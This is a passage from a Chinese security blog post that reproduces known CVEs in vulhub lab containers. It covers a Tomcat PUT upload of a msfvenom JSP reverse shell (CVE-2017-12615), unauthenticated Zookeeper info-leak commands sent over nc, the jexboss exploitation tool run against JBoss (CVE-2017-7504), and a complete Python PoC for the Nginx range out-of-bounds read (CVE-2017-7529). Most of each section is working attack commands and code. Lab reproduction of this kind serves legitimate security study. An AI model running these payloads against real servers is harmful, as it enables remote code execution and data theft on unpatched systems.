https://github.com/vulhub/vulhub.git
cd vulhub/tomcat/CVE-2017-12615
docker-compose up -d
</code></pre></div><p><code>msf</code>生成<code>jsp</code>马:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>msfvenom -p java/jsp_shell_reverse_tcp LHOST<span style=color:#f92672>=</span>&lt;ip&gt; LPORT<span style=color:#f92672>=</span>&lt;port&gt; -f raw &gt; shell.jsp
</code></pre></div><p><code>PUT</code>上传<code>jsp</code>马:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>curl -v -X PUT --data-binary @shell.jsp <span style=color:#e6db74>&#34;http://&lt;ip&gt;:8080/shell.jsp/&#34;</span>
</code></pre></div><h3 id=zookeeper-未授权访问漏洞-cve-2014-085>Zookeeper 未授权访问漏洞 CVE-2014-085<a hidden class=anchor aria-hidden=true href=#zookeeper-未授权访问漏洞-cve-2014-085>#</a></h3><h4 id=漏洞描述-12>漏洞描述<a hidden class=anchor aria-hidden=true href=#漏洞描述-12>#</a></h4><p>默认安装配置好的<code>Zookeeper</code>允许未授权访问，管理员未配置访问控制列表(<code>ACL</code>)，导致攻击者可以在默认开放的<code>2181</code>端口下通过执行<code>envi</code>命令获得大量敏感信息(系统名称、<code>java</code>环境)导致任意用户可以在网络不受限的情况下进行未授权访问读取数据。</p><h4 id=影响版本-12>影响版本<a hidden class=anchor aria-hidden=true href=#影响版本-12>#</a></h4><p><code>Apache Zookeeper</code></p><h4 id=复现思路-12>复现思路<a hidden class=anchor aria-hidden=true href=#复现思路-12>#</a></h4><h4 id=漏洞复现-12>漏洞复现<a hidden class=anchor aria-hidden=true href=#漏洞复现-12>#</a></h4><p><code>Zookeeper</code>默认开放<code>2181</code>端口，使用如下命令获取敏感信息:</p><pre><code>echo envi | nc xxx.xxx.xxx.xxx 2181

1、stat:列出关于性能和连接的客户端的统计信息。
echo stat |ncat &lt;ip&gt; 2181

2、ruok:测试服务器是否运行在非错误状态。
echo ruok |ncat &lt;ip&gt; 2181

3、reqs:列出未完成的请求。
echo reqs |ncat &lt;ip&gt; 2181
　　
4、envi:打印有关服务环境的详细信息。
echo envi |ncat &lt;ip&gt; 2181
　　
5、dump:列出未完成的会话和临时节点。
echo dump |ncat &lt;ip&gt; 2181
</code></pre><h2 id=jboss>JBoss<a hidden class=anchor aria-hidden=true href=#jboss>#</a></h2><h3 id=jboss-4x-jbossmq-jms-反序列化漏洞-cve-2017-7504>JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504<a hidden class=anchor aria-hidden=true href=#jboss-4x-jbossmq-jms-反序列化漏洞-cve-2017-7504>#</a></h3><h4 id=漏洞描述-13>漏洞描述<a hidden class=anchor aria-hidden=true href=#漏洞描述-13>#</a></h4><p><code>Red Hat JBoss Application Server</code>是一款基于<code>JavaEE</code>的开源应用服务器。<code>JBoss AS 4.x</code>及之前版本中，<code>JBossMQ</code>实现过程的<code>JMS over HTTP Invocation Layer</code>的<code>HTTPServerILServlet.java</code>文件存在反序列化漏洞，攻击者可借助特制的序列化数据利用该漏洞执行任意代码。</p><h4 id=影响版本-13>影响版本<a hidden class=anchor aria-hidden=true href=#影响版本-13>#</a></h4><p><code>JBoss AS 4.x</code>及之前。</p><h4 id=复现思路-13>复现思路<a hidden class=anchor aria-hidden=true href=#复现思路-13>#</a></h4><h4 id=漏洞复现-13>漏洞复现<a hidden class=anchor aria-hidden=true href=#漏洞复现-13>#</a></h4><p>环境搭建:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>git clone https://github.com/vulhub/vulhub.git
cd vulhub/jboss/CVE-2017-7504
docker-compose up -d
</code></pre></div><p><code>Jexboss</code>工具:<a href=https://github.com/joaomatosf/jexboss>joaomatosf/jexboss: JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool (github.com)</a></p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>git clone https://github.com/joaomatosf/jexboss.git

python3 jexboss.py -host http://&lt;ip&gt;:8080
</code></pre></div><p>成功利用漏洞执行命令。</p><h2 id=nginx>Nginx<a hidden class=anchor aria-hidden=true href=#nginx>#</a></h2><h3 id=nginx-越界读取缓存漏洞-cve-2017-7529>Nginx 越界读取缓存漏洞 CVE-2017-7529<a hidden class=anchor aria-hidden=true href=#nginx-越界读取缓存漏洞-cve-2017-7529>#</a></h3><h4 id=漏洞描述-14>漏洞描述<a hidden class=anchor aria-hidden=true href=#漏洞描述-14>#</a></h4><p><code>Nginx</code>在反向代理站点的时候，通常会缓存一些文件，特别是静态文件。缓存的部分存储在文件中，每个缓存文件包括<code>文件头</code>+<code>HTTP返回包头</code>+<code>HTTP返回包体</code>。如果二次请求命中该缓存文件，<code>Nginx</code>会直接将该文件中的<code>HTTP返回包体</code>返回给用户。</p><p>如果我的请求中包含<code>Range</code>头，<code>Nginx</code>将会根据我指定的<code>start</code>和<code>end</code>位置，返回指定长度的内容。而如果我构造了两个负的位置，如(-600, -9223372036854774591)，将可能读取到负位置的数据。如果这次请求又命中了缓存文件，则可能读取到缓存文件中位于<code>HTTP返回包体</code>前的<code>文件头</code>、<code>HTTP返回包头</code>等内容。</p><h4 id=影响版本-14>影响版本<a hidden class=anchor aria-hidden=true href=#影响版本-14>#</a></h4><p><code>Nginx 0.5.6 ~ 1.13.2</code></p><h4 id=复现思路-14>复现思路<a hidden class=anchor aria-hidden=true href=#复现思路-14>#</a></h4><h4 id=漏洞复现-14>漏洞复现<a hidden class=anchor aria-hidden=true href=#漏洞复现-14>#</a></h4><p>环境搭建:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>git clone https://github.com/vulhub/vulhub.git
cd vulhub/nginx/CVE-2017-7529
docker-compose up -d
</code></pre></div><p>访问:<code>http://&lt;ip>:8080</code>正常即可。</p><p><code>POC</code>已经在当前目录中给出来，文件名<code>poc.py</code>:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=color:#75715e>#!/usr/bin/env python</span>
<span style=color:#f92672>import</span> sys
<span style=color:#f92672>import</span> requests

<span style=color:#66d9ef>if</span> len(sys<span style=color:#f92672>.</span>argv) <span style=color:#f92672>&lt;</span> <span style=color:#ae81ff>2</span>:
    <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#34;</span><span style=color:#e6db74>%s</span><span style=color:#e6db74> url&#34;</span> <span style=color:#f92672>%</span> (sys<span style=color:#f92672>.</span>argv[<span style=color:#ae81ff>0</span>]))
    <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#34;eg: python </span><span style=color:#e6db74>%s</span><span style=color:#e6db74> http://your-ip:8080/&#34;</span> <span style=color:#f92672>%</span> (sys<span style=color:#f92672>.</span>argv[<span style=color:#ae81ff>0</span>]))
    sys<span style=color:#f92672>.</span>exit()

headers <span style=color:#f92672>=</span> {
    <span style=color:#e6db74>&#39;User-Agent&#39;</span>: <span style=color:#e6db74>&#34;Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240&#34;</span>
}
offset <span style=color:#f92672>=</span> <span style=color:#ae81ff>605</span>
url <span style=color:#f92672>=</span> sys<span style=color:#f92672>.</span>argv[<span style=color:#ae81ff>1</span>]
file_len <span style=color:#f92672>=</span> len(requests<span style=color:#f92672>.</span>get(url, headers<span style=color:#f92672>=</span>headers)<span style=color:#f92672>.</span>content)
n <span style=color:#f92672>=</span> file_len <span style=color:#f92672>+</span> offset
headers[<span style=color:#e6db74>&#39;Range&#39;</span>] <span style=color:#f92672>=</span> <span style=color:#e6db74>&#34;bytes=-</span><span style=color:#e6db74>%d</span><span style=color:#e6db74>,-</span><span style=color:#e6db74>%d</span><span style=color:#e6db74>&#34;</span> <span style=color:#f92672>%</span> (
    n, <span style=color:#ae81ff>0x8000000000000000</span> <span style=color:#f92672>-</span> n)

r <span style=color:#f92672>=</span> requests<span style=color:#f92672>.</span>get(url, headers<span style=color:#f92672>=</span>headers)
</code></pre></div><p>使用<code>POC</code>进行验证:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python>python3 poc<span style=color:#f92672>.</span>py http:<span style=color:#f92672>//&lt;</span>ip<span style=color:#f92672>&gt;</span>:<span style=color:#ae81ff>8080</span><span style=color:#f92672>/</span>

<span style=color:#75715e># 获取到的文件头及返回包头</span>
<span style=color:#f92672>--</span><span style=color:#ae81ff>0000000000000000001</span><span style=color:#ae81ff>9</span>
Content<span style=color:#f92672>-</span>Type: text<span style=color:#f92672>/</span>html; charset<span style=color:#f92672>=</span>utf<span style=color:#f92672>-</span><span style=color:#ae81ff>8</span>
Content<span style=color:#f92672>-</span>Range: bytes <span style=color:#f92672>-</span><span style=color:#ae81ff>605</span><span style=color:#f92672>-</span><span style=color:#ae81ff>611</span><span style=color:#f92672>/</span><span style=color:#ae81ff>612</span>

<span style=color:#960050;background-color:#1e0010>’‰Ô</span><span style=color:#e6db74>`b`</span>RY:<span style=color:#960050;background-color:#1e0010>‡Ô`</span>r<span style=color:#960050;background-color:#1e0010>«</span>\me<span style=color:#e6db74>&#34;59526062-264&#34;</span>
KEY: http:<span style=color:#f92672>//</span><span style=color:#ae81ff>127.0</span><span style=color:#f92672>.</span><span style=color:#ae81ff>0.1</span>:<span style=color:#ae81ff>8081</span><span style=color:#f92672>/</span>
</code></pre></div><blockquote><p>本文链接:<a href=https://oopsdc.tk/post/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/>漏洞复现 | Atmet (oopsdc.tk)</a></p><p>文章许可:本文采用<a href=https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh>CC BY-NC-SA 4.0</a>许可协议，转载请注明出处。</p></blockquote></div><footer class=post-footer><ul class=post-tags><li><a href=https://oopsdc.tk/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/>漏洞复现</a></li></ul><nav class=paginav><a class=prev href=https://oopsdc.tk/post/web%E6%BC%8F%E6%B4%9E/><span class=title>« Prev Page</span><br><span>Web漏洞</span></a>
<a class=next href=https://oopsdc.tk/post/%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA/><span class=title>Next Page »</span><br><span>博客搭建</span></a></nav></footer></article></main><footer class=footer><span>&copy; 2021 <a href=https://oopsdc.tk/>Atmet</a></span>
<span>&#183;</span>
<span>Powered by <a href=https://gohugo.io/ rel="noopener noreferrer" target=_blank>Hugo</a></span>
<span>&#183;</span>
<span>Theme <a href=https://git.io/hugopapermod rel=noopener target=_blank>PaperMod</a></span></footer><a href=#top aria-label="go to top" title="Go to Top (Alt + G)"><button class=top-link id=top-link type=button accesskey=g><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 12 6" fill="currentcolor"><path d="M12 6H0l6-6z"/></svg></button></a>
<script defer src=/assets/js/highlight.min.7680afc38aa6b15ddf158a4f3780b7b1f7dde7e91d26f073e6229bb7a0793c92.js integrity="sha256-doCvw4qmsV3fFYpPN4C3sffd5+kdJvBz5iKbt6B5PJI=" onload=hljs.initHighlightingOnLoad()></script><script>window.onload=function(){localStorage.getItem("menu-scroll-position")&&(document.getElementById('menu').scrollLeft=localStorage.getItem("menu-scroll-position"))};function menu_on_scroll(){localStorage.setItem("menu-scroll-position",document.getElementById('menu').scrollLeft)}document.querySelectorAll('a[href^="#"]').forEach(a=>{a.addEventListener("click",function(b){b.preventDefault();var a=this.getAttribute("href").substr(1);window.matchMedia('(prefers-reduced-motion: reduce)').matches?document.querySelector(`[id='${decodeURIComponent(a)}']`).scrollIntoView():document.querySelector(`[id='${decodeURIComponent(a)}']`).scrollIntoView({behavior:"smooth"}),a==="top"?history.replaceState(null,null," "):history.pushState(null,null,`#${a}`)})})</script><script>var mybutton=document.getElementById("top-link");window.onscroll=function(){document.body.scrollTop>800||document.documentElement.scrollTop>800?(mybutton.style.visibility="visible",mybutton.style.opacity="1"):(mybutton.style.visibility="hidden",mybutton.style.opacity="0")}</script><script>document.getElementById("theme-toggle").addEventListener("click",()=>{document.body.className.includes("dark")?(document.body.classList.remove('dark'),localStorage.setItem("pref-theme",'light')):(document.body.classList.add('dark'),localStorage.setItem("pref-theme",'dark'))})</script></body></html>